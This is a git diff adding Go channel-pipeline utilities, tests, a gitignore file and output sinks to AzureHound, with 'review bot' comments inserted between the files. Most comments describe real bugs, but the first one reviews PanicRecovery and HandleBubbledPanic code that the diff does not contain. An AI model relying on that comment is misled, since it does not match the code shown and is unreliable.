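Review bot: The send in `PanicRecovery` is unconditional on an unbuffered `PanicChan`, so it blocks forever whenever the goroutine started by `HandleBubbledPanic` is not receiving: after it has returned on `ctx.Done()` (which is the usual state shortly after the first reported panic calls `stop()`), or if it was never started. A later panicking worker then hangs inside its deferred recovery and its panic and stack trace are never logged. Build the error first and make the send non-blocking, e.g. `select { case PanicChan <- err: default: }`, writing the error to stderr in the `default` branch so it is not lost. The two doc comments also name `handleBubbledPanic`, `panicRecovery` and `panicChan` while the identifiers are exported; they should begin with `HandleBubbledPanic` and `PanicRecovery`.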
diff --git a/pipeline/pipeline.go b/pipeline/pipeline.go
new file mode 100644
index 0000000..d4b4df5
--- /dev/null
+++ b/pipeline/pipeline.go
@@ -0,0 +1,276 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package pipeline
+
+import (
+ "encoding/json"
+ "reflect"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/internal"
+)
+
+type Result[T any] struct {
+ Error error
+ Ok T
+}
+
+// Send sends a value to a channel while monitoring the done channel for cancellation
+func Send[D, T any](done <-chan D, tgt chan<- T, val T) bool {
+ select {
+ case tgt <- val:
+ return true
+ case <-done:
+ return false
+ }
+}
+
+// SendAny sends a value to an any channel while monitoring the done channel for cancellation
+func SendAny[T any](done <-chan T, tgt chan<- any, val any) bool {
+ select {
+ case tgt <- val:
+ return true
+ case <-done:
+ return false
+ }
+}
+
+// OrDone provides an explicit cancellation mechanism to ensure the encapsulated and downstream goroutines are cleaned
+// up. This frees the caller from depending on the input channel to close in order to free the goroutine, thus
+// preventing possible leaks.
+func OrDone[D, T any](done <-chan D, in <-chan T) <-chan T {
+ out := make(chan T)
+
+ go func() {
+ defer close(out)
+ for {
+ select {
+ case <-done:
+ return
+ case val, ok := <-in:
+ if !ok {
+ return
+ } else {
+ select {
+ case out <- val:
+ case <-done:
+ }
+ }
+ }
+ }
+ }()
+ return out
+}
+
+// Mux joins multiple channels and returns a channel as single stream of data.
+func Mux[D any](done <-chan D, channels ...<-chan any) <-chan any {
+ var wg sync.WaitGroup
+ out := make(chan interface{})
+
+ muxer := func(channel <-chan any) {
+ defer wg.Done()
+ for item := range OrDone(done, channel) {
+ if ok := Send(done, out, item); !ok {
+ return
+ }
+ }
+ }
+
+ wg.Add(len(channels))
+ for _, channel := range channels {
+ go muxer(channel)
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ }()
+
+ return out
+}
+
+// Demux distributes the stream of data from a single channel across multiple channels to parallelize CPU use and I/O
+func Demux[D, T any](done <-chan D, in <-chan T, size int) []<-chan T {
+ outputs := make([]chan T, size)
+
+ for i := range outputs {
+ outputs[i] = make(chan T)
+ }
+
+ closeOutputs := func() {
+ for i := range outputs {
+ close(outputs[i])
+ }
+ }
+
+ cases := internal.Map(outputs, func(out chan T) reflect.SelectCase {
+ return reflect.SelectCase{
+ Dir: reflect.SelectSend,
+ Chan: reflect.ValueOf(out),
+ }
+ })
+
+ go func() {
+ defer closeOutputs()
+ for item := range OrDone(done, in) {
+ // send item to exactly one channel
+ for i := range cases {
+ cases[i].Send = reflect.ValueOf(item)
+ }
+ reflect.Select(cases)
+ }
+ }()
+
+ return internal.Map(outputs, func(out chan T) <-chan T { return out })
+}
+
+func ToAny[D, T any](done <-chan D, in <-chan T) <-chan any {
+ return Map(done, in, func(t T) any {
+ return any(t)
+ })
+}
+
+func Map[D, T, U any](done <-chan D, in <-chan T, fn func(T) U) <-chan U {
+ out := make(chan U)
+ go func() {
+ defer close(out)
+ for item := range OrDone(done, in) {
+ if ok := Send(done, out, fn(item)); !ok {
+ return
+ }
+ }
+ }()
+ return out
+}
+
+func Filter[D, T any](done <-chan D, in <-chan T, fn func(T) bool) <-chan T {
+ out := make(chan T)
+ go func() {
+ defer close(out)
+ for item := range OrDone(done, in) {
+ if fn(item) {
+ if ok := Send(done, out, item); !ok {
+ return
+ }
+ }
+ }
+ }()
+ return out
+}
+
+// Tee copies the stream of data from a single channel to zero or more channels
+func Tee[D, T any](done <-chan D, in <-chan T, outputs ...chan T) {
+ go func() {
+ // Need to close outputs when goroutine exits to ensure we avoid deadlock
+ defer func() {
+ for i := range outputs {
+ close(outputs[i])
+ }
+ }()
+
+ for item := range OrDone(done, in) {
+ for _, out := range outputs {
+ select {
+ case out <- item:
+ case <-done:
+ return
+ }
+ }
+ }
+ }()
+}
+
+func TeeFixed[D, T any](done <-chan D, in <-chan T, size int) []<-chan T {
+ out := internal.Map(make([]any, size), func(_ any) chan T {
+ return make(chan T)
+ })
+ Tee(done, in, out...)
+ return internal.Map(out, func(c chan T) <-chan T {
+ return c
+ })
+}
+
+func Batch[D, T any](done <-chan D, in <-chan T, maxItems int, maxTimeout time.Duration) <-chan []T {
+ out := make(chan []T)
+
+ go func() {
+ defer close(out)
+
+ timeout := time.After(maxTimeout)
+ var batch []T
+ for {
+ select {
+ case <-done:
+ return
+ case item, ok := <-in:
+ if !ok {
+ if len(batch) > 0 {
+ if ok = Send(done, out, batch); !ok {
+ return
+ }
+ batch = nil
+ }
+ return
+ } else {
+ // Add to batch
+ batch = append(batch, item)
+
+ // Flush if limit is reached
+ if len(batch) >= maxItems {
+ if ok = Send(done, out, batch); !ok {
+ return
+ }
+ batch = nil
+ timeout = time.After(maxTimeout)
+ }
+ }
+ case <-timeout:
+ if len(batch) > 0 {
+ if ok := Send(done, out, batch); !ok {
+ return
+ }
+ batch = nil
+ }
+ timeout = time.After(maxTimeout)
+ }
+ }
+ }()
+
+ return out
+}
+
+func FormatJson[D, T any](done <-chan D, in <-chan T) <-chan string {
+ out := make(chan string)
+
+ go func() {
+ defer close(out)
+
+ for item := range OrDone(done, in) {
+ if bytes, err := json.Marshal(item); err != nil {
+ panic(err)
+ } else {
+ if ok := Send(done, out, string(bytes)); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ return out
+}
diff --git a/pipeline/pipeline_test.go b/pipeline/pipeline_test.go
new file mode 100644
index 0000000..07c3617
--- /dev/null
+++ b/pipeline/pipeline_test.go
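Review bot: In `Demux`, `reflect.Select(cases)` holds only send cases, so once a reader stops draining its output the goroutine stays blocked there even after `done` is closed; `OrDone` guards the receive side only, and the deferred `closeOutputs` never runs. `Send`, `Map`, `Filter`, `Tee` and `Batch` in this file all pair their send with `<-done`; Demux should do the same by adding a receive case on `done` and returning when that case is chosen, as sketched below. Separately, `FormatJson` calls `panic(err)` inside its goroutine when `json.Marshal` fails, which ends the whole process unless the caller has arranged a recover in that goroutine; the `Result[T]` type declared at the top of the file looks like the intended way to pass such an error downstream.

```go
	// … unchanged: outputs, closeOutputs and the send cases built with internal.Map …

	// One extra case receives from done, so a send with no reader ends on cancellation.
	cases = append(cases, reflect.SelectCase{
		Dir:  reflect.SelectRecv,
		Chan: reflect.ValueOf(done),
	})

	// … unchanged: goroutine start and deferred closeOutputs …
		for item := range OrDone(done, in) {
			// only the first len(outputs) cases are sends
			for i := range outputs {
				cases[i].Send = reflect.ValueOf(item)
			}
			if chosen, _, _ := reflect.Select(cases); chosen == len(outputs) {
				return
			}
		}
```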
@@ -0,0 +1,106 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package pipeline_test
+
+import (
+ "fmt"
+ "sync"
+ "testing"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+)
+
+func TestBatch(t *testing.T) {
+
+ done := make(chan interface{})
+ in := make(chan string)
+
+ go func() {
+ in <- "foo"
+ in <- "bar"
+
+ in <- "bazz"
+ time.Sleep(5 * time.Millisecond)
+
+ in <- "buzz"
+
+ close(in)
+ }()
+
+ batches := map[int]int{}
+ i := 0
+ for batch := range pipeline.Batch(done, in, 2, 5*time.Millisecond) {
+ batches[i] = len(batch)
+ i++
+ fmt.Println(batch)
+ }
+
+ if len(batches) != 3 {
+ t.Errorf("got %v, want %v", len(batches), 3)
+ }
+
+ if length, ok := batches[0]; !ok || length != 2 {
+ t.Errorf("got %v, want %v", length, 2)
+ }
+
+ if length, ok := batches[1]; !ok || length != 1 {
+ t.Errorf("got %v, want %v", length, 1)
+ }
+
+ if length, ok := batches[2]; !ok || length != 1 {
+ t.Errorf("got %v, want %v", length, 1)
+ }
+}
+
+func TestDemux(t *testing.T) {
+
+ var (
+ done = make(chan interface{})
+ in = make(chan string)
+ wg sync.WaitGroup
+ count int
+ )
+
+ go func() {
+ defer close(in)
+ in <- "foo"
+ in <- "bar"
+ in <- "bazz"
+ in <- "buzz"
+ }()
+
+ outs := pipeline.Demux(done, in, 2)
+ wg.Add(len(outs))
+ for i := range outs {
+ out := outs[i]
+ go func() {
+ defer wg.Done()
+ for s := range out {
+ fmt.Println(s)
+ count++
+ }
+ }()
+ }
+
+ wg.Wait()
+ if count != 4 {
+ t.Fail()
+ }
+
+}
diff --git a/sec.gitignore b/sec.gitignore
new file mode 100644
index 0000000..458aa00
--- /dev/null
+++ b/sec.gitignore
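Review bot: `count++` in `TestDemux` runs in both reader goroutines with no synchronisation, so the test contains a data race and is reported by `go test -race`; guard the increment with a mutex (`mu.Lock()`, `count++`, `mu.Unlock()`) or count per goroutine and sum after `wg.Wait()`. `TestBatch` also depends on timing: the `5*time.Millisecond` batch timeout and the 5 ms `time.Sleep` expire at about the same moment, so "bazz" and "buzz" can land in one batch and the `len(batches) != 3` check can fail intermittently; a sleep clearly longer than the timeout would make the ordering deterministic. Neither test closes `done`, so the cancellation paths of `Batch` and `Demux` are not exercised.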
@@ -0,0 +1,234 @@ +################ +# Project Settings +################################ + +# The binary file for darwin and linux +azurehound + +*.json* + +################ +# Boilerplate Settings (modify as needed) +# (https://github.com/github/gitignore) +################################ + +######## +# Go +################ + +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, built with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Dependency directories (remove the comment below to include it) +# vendor/ + +# Go workspace file +go.work + +######## +# Linux +################ + +*~ + +# temporary files which can be created if a process still has a handle open of a deleted file +.fuse_hidden* + +# KDE directory preferences +.directory + +# Linux trash folder which might appear on any partition or disk +.Trash-* + +# .nfs files are created when an open file is removed but is still being accessed +.nfs* + +######## +# MacOS +################ + +# General +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + +# Thumbnails +._* + +# Files that might appear in the root of a volume +.DocumentRevisions-V100 +.fseventsd +.Spotlight-V100 +.TemporaryItems +.Trashes +.VolumeIcon.icns +.com.apple.timemachine.donotpresent + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk + +######## +# Windows +################ + +# Windows thumbnail cache files +Thumbs.db +Thumbs.db:encryptable +ehthumbs.db +ehthumbs_vista.db + +# Dump file +*.stackdump + +# Folder config file +[Dd]esktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Windows Installer files +*.cab +*.msi +*.msix +*.msm +*.msp + +# Windows shortcuts +*.lnk + +######## +# JetBrains +################ + +# User-specific stuff +.idea/**/workspace.xml +.idea/**/tasks.xml +.idea/**/usage.statistics.xml 
+.idea/**/dictionaries +.idea/**/shelf + +# AWS User-specific +.idea/**/aws.xml + +# Generated files +.idea/**/contentModel.xml + +# Sensitive or high-churn files +.idea/**/dataSources/ +.idea/**/dataSources.ids +.idea/**/dataSources.local.xml +.idea/**/sqlDataSources.xml +.idea/**/dynamic.xml +.idea/**/uiDesigner.xml +.idea/**/dbnavigator.xml + +# Gradle +.idea/**/gradle.xml +.idea/**/libraries + +# Gradle and Maven with auto-import +# When using Gradle or Maven with auto-import, you should exclude module files, +# since they will be recreated, and may cause churn. Uncomment if using +# auto-import. +# .idea/artifacts +# .idea/compiler.xml +# .idea/jarRepositories.xml +# .idea/modules.xml +# .idea/*.iml +# .idea/modules +# *.iml +# *.ipr + +# CMake +cmake-build-*/ + +# Mongo Explorer plugin +.idea/**/mongoSettings.xml + +# File-based project format +*.iws + +# IntelliJ +out/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Cursive Clojure plugin +.idea/replstate.xml + +# SonarLint plugin +.idea/sonarlint/ + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Editor-based Rest Client +.idea/httpRequests + +# Android studio 3.1+ serialized cache file +.idea/caches/build_file_checksums.ser + +######## +# Vim +################ + +# Swap +[._]*.s[a-v][a-z] +!*.svg # comment out if you don't need vector files +[._]*.sw[a-p] +[._]s[a-rt-v][a-z] +[._]ss[a-gi-z] +[._]sw[a-p] + +# Session +Session.vim +Sessionx.vim + +# Temporary +.netrwhist +*~ +# Auto-generated tag files +tags +# Persistent undo +[._]*.un~ + +######## +# Visual Studio Code +################ + +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix 
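Review bot: Git reads ignore rules only from files named `.gitignore` (plus `.git/info/exclude` and the file set in `core.excludesFile`), so under the name `sec.gitignore` none of these patterns take effect unless something outside this patch points Git at the file. That matters most for the project rules at the top: `*.json*` presumably exists to keep collected output out of commits, and `azurehound` to keep the built binary out. If the name is not deliberate, the file should be `.gitignore` at the repository root.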
diff --git a/sinks/console.go b/sinks/console.go
new file mode 100644
index 0000000..68ec77a
--- /dev/null
+++ b/sinks/console.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package sinks
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+)
+
+func WriteToConsole[T any](ctx context.Context, stream <-chan T) {
+ for item := range pipeline.OrDone(ctx.Done(), stream) {
+ fmt.Println(item)
+ }
+}
diff --git a/sinks/file.go b/sinks/file.go
new file mode 100644
index 0000000..922ac59
--- /dev/null
+++ b/sinks/file.go
@@ -0,0 +1,64 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package sinks
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+ "os"
+
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+)
+
+func WriteToFile[T any](ctx context.Context, filePath string, stream <-chan T) error {
+
+ if file, err := os.OpenFile(filePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0666); err != nil {
+ return err
+ } else {
+ defer file.Close()
+
+ if _, err := file.WriteString("{\n\t\"data\": [\n"); err != nil {
+ return err
+ } else {
+ meta := models.Meta{
+ Type: "azure",
+ Version: 5,
+ Count: 0,
+ }
+
+ format := "\t\t%v"
+ for item := range pipeline.OrDone(ctx.Done(), stream) {
+ if _, err := file.WriteString(fmt.Sprintf(format, item)); err != nil {
+ return err
+ }
+ meta.Count++
+ format = ",\n\t\t%v"
+ }
+
+ if bytes, err := json.Marshal(meta); err != nil {
+ return err
+ } else if _, err := file.WriteString(fmt.Sprintf("\n\t],\n\t\"meta\": %s\n}\n", string(bytes))); err != nil {
+ return err
+ } else {
+ return nil
+ }
+ }
+ }
+}
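Review bot: `os.OpenFile(..., 0666)` in `WriteToFile` creates the output file readable by every local user under a typical umask, and this file holds the collected Azure data; create it owner-only instead: `os.OpenFile(filePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0600)`. The mode applies only when the file is created, so a pre-existing file with wider permissions keeps them after `O_TRUNC`. Two smaller points in the same function: the deferred `file.Close()` discards its error, so a write failure surfaced at close is reported as success, and when `ctx` is cancelled the loop just ends and the footer is still written, leaving a well-formed file that silently holds partial data; returning `ctx.Err()` in that case would let the caller tell the difference.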
diff --git a/test/1.jpg b/test/1.jpg deleted file mode 100644 index 2c4093ec3ad24d65c6bdbdb5744e9a94ca4890ed..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 612508 zcmbT6V{j!*(C<%dI~&_JHnw@ZQHh;jcsQ)yZ3pk-nw-^-`~u9>8|dn zshSV-@9BRV|9%0`<)!7M0T2)X0K|U-@b52xRKm%@+10|$&BC0_)Q8O0*}{t1)xzw5 zjsFe+xKiFWmH>c~5`X~!0KosZ{^Q>^APfNge}RRCfrW*K`ww_zg#Q5<3mFypzlnu` zjgE$njX{EkgM&vxLHv!Ff`OWvfs2DnQqln8|HecA|0Vc01i*lY=7S4@f}j9EVn9G) zK>Qm4@BjdikWdi+bIAV%1{N9)@Sh1D0Rr$pj{nC61q}lU0f2@3w*^3kf&f6GL!ti{ z^nO2e!1oUzSOnbxW^837K)NvlqCk`1n#8|)TAQ09)VM>c#}6DAd0XlQ4AG4}hkWx& zmm}VeCoP_txjmCesdxFt>1aJ8og_;M*xC)fWr8wA9NZM-0#?c+E;RfZ#qnkm@LPg5 zK;X0ho(=G>G*EFisRSHA>~4LZ9k9P>f-dI(c3siL-LF4>1Mr?1APE;W8oBggmHw(Y zgKp;d)pQ1i;~~$-&az6&jHq7H)Xf@P3xhp(0TmqK$j^BwW$RNVwBrPR!eDXlaMLj9 zwN2Ej9~4I=j4+hQ2xqSil-GxbDKl^!4U@|(mNP+fEP%Cfl670XVq6gvt)J4fHNd*9 zb2))}uE!7r>bnuGre#w}T{`Aj9x&r3^Va=PV&!tscCq|3*j9_kdeVt*&7;J&>RW}i zk+}?2!!|VKGvNFs5rKr!GJ&3$rjuQUZiR27GLj~t%7%g(0S-Ce7TWL`b!y>)eU?fY zK%C;O_Qd#NO!C5W;tXVN1GB7rLP!&2_qskioF}_px7*7SJ!N%mrBL$Ly$VogGY-Tc zPiT^bx`2#yvBm;n=`DpfkJ1TO%@t8d(ssn3QqJ08YsvYgV10J{f%micuERl*L^)v9D>j5qek5CQdaiR>v!R|_I4sBB zxjsPRAmEHgwW-82glRw&l@BVd0oWsGL)^DuY>L#p@#kuRzkVX89ZG}uo zhT}wY;}rDE?Y!CUAZ_b=a=db)YdVSZP;8FTqKEmo^`j7k%p!rF>N6^h=bMJO)r%GD zm1CEJ0SCM$(J#&-@jT!%y>_enYVWFCkJQ% zUt_u$|J%0e1Ch<|cgR4;BwF+~bNla^$8LF3@KFUrhmS~Xo1 zkqdFVB+i|odRHTT24zb8K*EVN&fBuqx2zj8v+8(3c2#P|$i*Q!tXq`^JTlex1ufKB zgo>=L*-~(v2~>)m1$zm$$|HhwHN!k-#pEEv{v6(<7697}e}a-ppor z1P~d)_?4t*wc844r^|z1bR{qEC@25%X%qk>MA$mi9eX`3OhmcLdo# z!ukLbM}%uZ@)kxuV_JwCe9lBU2FiZK)7bb!t$Ev%5Jl>?s=HQ&QJ_2$r>B9|lbpm6 zIYCYBoP?eBw%+fI?aZ^zJIvTQ=@B!rGuo1>4H}GD)79|-*61_}JJn@XkTLz#LfVI6 zeZr_>HY~#&H4Lz6twJgXzKr-8BbKgc&$}J69B0$DwJGIVD5l0*J6b-pV{8iyJ*D%) zi9oRG-4T()i>YjfQPZ|vzjTQt6p0I_XwvjbCRwOm&UG%xt~P3BChl>pDCZ4pY_VNh zsLXu2tGm`y-kFJZkqsNG{+aOi?MXS%P3jXij5vWH@BOcGxM@w%c`QTYFTP1GprDkc zuJ@g!xX*DBqxrfyPNFP*lVGtZa~Fj#R$}bs_Vnk>V*2OUQSOz_!r6PO>K$44Lf=(x 
zK*&t_){*48R_%`E0APocIkwLM)@eG*bC>pkcvy7Q_J&rNjF(Y8cO;32D3?XOeOrjrS=*5zrl`)gM=73%xMEy$xh;-k8Z=Xkf;d!Te)CGTOT)3; zh>fIeK=@aaIAWiJonS-YA3%5xk7hA**|}cM z|AR2WB^N1gW-{+qA{VajX=mP}4VwnKOxC^X+UF5Z4H>1~E^m89$etr>tXC#IY5rspxfhF2 zerUw)bObvD!VI^6fF)GEdT&r>1|OXwCb4U+5T~B3uxGApg|W7;$rb7!Cl* zR*O~`+n|kx)w9%ZcSM{meO$z4W z`yGg?Up0x6ZQ87p_b^B!Up!Q{8OgwTzM*+IRK158wL0lcs}eLaopi!pgut`buv9*( zWe}iMX}Hwd!tmnPjd+t^r0vRk`diH%j5k82IXUrgh5KUJE{owiRr@Xn7vQ3alf(1w z$iEWJ&v`^HVYm5~)cfRlwF#d7mFa?4-c|P)E7rbwTBT)z`a5+UF;&W5>ZwQK}`)i?mDWbm;Mp9;7TTn(~HNVv&*u|>DyulS& z`D`!MAf8Hs21cCf2aqnrg;?v5O<&U=!@2R_r6^mQpH2*E;K98tGKFeQ*5}6<#M~c2 zfZENKEqjwv*y=bsI}Y9V=>UH`Rzd=}>J_;=dFJ31sdecvizQ11fVav7t z`RL2)x(fPxUI#7?@u$~%7#aEpka+z}(Q+bjP~beH56gU|B~%`tg3GfzlDLX0@NX_t zc9}`;&+W7SBCHX2N?0?vGT@ObHH>E}Y-VQf*`&JCE>%+Q*~|~98W(%C6XfGgHlShU z+%cJX+F9?p8Rr}$x!m>7d?}Ld9987uoJmSPio2*JS8ixCKmP|1U2oRVU}_qaI&r0J z<8-`u8^ZpXQ`eo`kyR>zyTO?FoyO?pIf_n4(XhX0W@ha~s%>y0^ksBQ!Zb-t)A#Ji%4Ed9Bb9-3x-lA`ehJ5M zaA2<#7HzM5HNau6>a3lsk&}!l!H??Vl!C~@Rc*CQ(r%(MbIIV0v9fno1Y!G@{}Q2E zEH_{%HkJJO`#jsK?(y;X(a~XY9W5kYuhlKkwYi7_0ORK%|@9~Qa~E6 z7K!Q2``4NYz3qE%@PIuuccU%pg?_|IT%Nud2DtCeb5O~TB}e2V&ZRCeQ)%gJXcBsc z#u;MHmwCoV4hjYhE=0BUWl$mrTpPDR0PPmkjynGS1IWBII_>A(MkT9vZ{Rp!itNg9 ztb8cx*=&c{!(n&Y^3MWs;vIV`;gDGwCv9F%X=-8$XE!w=<6g8kh}@X+?e;UBulx7 zD0S2fzvkQL*ZE%4o^EXSlLP!)yQ;g=g@x^MGcwLFF`*g8wKrZf}R#bvx@=1zBXG|iYAU9 z<@8JokcBme~q9h z)7N!rqVmh6$^xBBt+vxF^>^fr8wT0XVr>U#7FDoTp3TRlqz2@hLC>#0GmdA0_bT_| zrTj32NCI}@9lUcXaR*g&Af^$UrmH?FU87Nq zKhWaNZ5>SPi$n~Dd?O6*=v5z5wbEF2pjI<}8&>7 z330AD)bJ7*Op;^N$rf7kd}ZuY_)3x8l(>OBaSK|x9l3?tq6#sk;`%(XX{f_GY<2CO zV!eisDap9g6cu|J3>CGCo_6a{^$ZjGdNWhtCV%94rpv)-A1WbZ`ZvGd>g~UkuE%j8 zi-w0NX`D9}G>B}U81A%*%S98Z=ZRjl;6e!<_sxiaQCb-Mwo~L|aefj*ZJ6VFPiG6H zR4PBqKPS9!ShQ{50<0AT@N(MZgCflu=TcP^u>M!@J$m!(G}!$Q$rtA#bX ztsP-1TrJUi+kYa@+vnEdRUbFqT%3Moo+9&#d@nJYMQs*{s9s}ZS3=>aU>ml0)>u+5 z&a@CU(pSa58>oFLwTA}Or=g2=Uaa3AL;WFSI&LMXV;qTa56rB7qu_|Lgnwh$o;-jl z$d2Pn`-xTWtB86bspGLtN2uCdjg?J4Xr_GPGBdIKD&{ZzFh#|eX#}umK1@1~6cqKRq^^FySGE;9#m-1O%nqMA@ 
zZEaNM2-a-}Cv50o@tS=zVSj^k5qHF9<>eybQ zoU)PyjgtR1-Tx4rQ<{XzSd(n-Yvaol;ep-#7~Q^L_#$lKn0_wtBNml@aWLrT+Md1~ zg*Q=DB)VI#^K919dy?Cq>vDRId@7axy)oIWfo_@(IYU!t&nfH1U zslf0EK@4|iKhPb#{A*Q4s;o4F0lId#=qi^&^w3*GzIAO=yRm$KSvFnW)^J^}0X}({ z0QG3z%v>g)T%Tl-L35J5Sy9iVYb^RnjwLoMzu^zaSd=n5riW7H!B&%J_;m>RCG2m& zCHrS98jPO=`7^KbP%0Xd=o{OMkeia19OmUIUyLFuE%&fBHB4$?HKzU}K#OgneFF+0 zk5VJ`7AMmaR-`f@OK&n;-ESO9Vpqr}<>YB+${W6}D9s+1m=h1LiK zs>buu@6@tomffL&{e)TtW=(kJK9$z>)hlGCVxoxP)(%+|lPvptg9Xno(KP0^yfx~0 zwLqtrSrGTZI7jV@fZHKeYcWSHCj0eN;~+ZLQ(3mKPI$2f2RWq)ar%rOfNt$2ooFT9 znw6u<$X?^;c}?CxsbU!OBDOG|ZmOUgGfOi*wk$LE+ioY1=%yc%8b%8FpU1Srl75d? zoTLf$!zXndEiF?4o%#hLhNYs^^t|@|gDhNKIEb=pB?#0YSjr391gih!A^*0(k~z zFPR5iEp-Y!JJrBBUin%8mmN)OAGtDuW^+}8A0k#ds8Hi%xfGxN%@%hR6X$*M@AhpU4qj|c?45X$TBW1b`?VWH&q0Y~ zwn~hzoE7S3Kt`=wfeUKbS9iQ^wHR=Tvc)T3<~bRwC9q04_eLZy+va{L_u%vGXe;9Wi z(IiEPrGPf*cqxA+?SgJ8G4!!%R|4BBU7L;6z8;WB>#pmqGdRJ9n@5`Gy$hnyT?3M8 zQ@77CWU2lNMCf&g_UInXbY9$KAyNLF#{_Cl%2hH4I`ZTu>m^|%UaeZ+%Om)=rG3G6 z)PYwzgylZSbBo7V=&$mu@~$id2!iN?ixs2vj6BZPca6>KXJaHqKe8*{ONL5f{CB_; z=-D9_hCKfj9;Y!a>cDu$>pon%YElkiE+q8KHoZZdtheT$Umo$>-$wh*= zHbrrQJ#l%uB;zzmr+!u|dj25%;8N!Fjg*(Vdis?)xn9nVFWHElvVGlN5pM4r(^{fs zKo)Vz;`X=?f|%G1_7x#qyYSnQO`=B>F!WlZEBk3w&&TG{;!3cnAzoO;fgtx2nxup# z=o*rE^>hGtB5P*4Fg+83;Am)1rdXJiM!r|e_qew9E;ptv+GUmI+h=^d1|5#wSXR$B z-+p5@utXY8z4#_qvpZ>hMp#XV5Wh3>uBvxs)Lm*%+M9=TZSnnDQ;uJ}XFq+w@BJgQ zHOyRlEl%OH%v2k{vp&DgytCegjE^$tAh-d)ZcAgGarRq~>B{>`yLfh@YFTPLx{n;q zC6ao+2C!cgUGpP9M%hZ=_>;6O`Gg<@&UQvXWeCca0ksFhNpa;|J2uW_IL_jcB(f_ zOv%W_T$O%zylZiti>~`F^6F1=Uw+Aq6nl!Oh;KY3uK<^g1%uj@}}kTr?sgBeT54` zEM%Ng{XVNPYP@RmNJU=+n@=jMnMXOe?$&3HDyMP`Ly!$9V-G-V-x9?Trl3$KPMkeU zp5mNdD_d(@QiNopXQe%Sj&^zpHXJF*>Z$s$e*!;wc0-)?^fQQq6Bix8l=vF9la)HD zz59Dks&k-h=Nyak-j^Z8#W=|%TzLpugH~H49|&lsbA&lJD~+4;#C@6P8V}B|zy_2~ zdQw1o$0LDdG+SpoA@e7-?iYiuKaxBS_>4IXV$jo0Blp&(-CF-jOY@arZ8B0bDTkB8?R9&6!G`BawntI8Wo@x~MQ>LA(HG;JkJu ziMWVv-_0G!F_|`ix!f?RHhC)%UrGLQu$36$h`>{ z>^;9w7wN24bS=z@Ap3hs|Bpys?FdiZT6qaaQO_nL3jdsel$&!02j-=HWsuwW=ht$t 
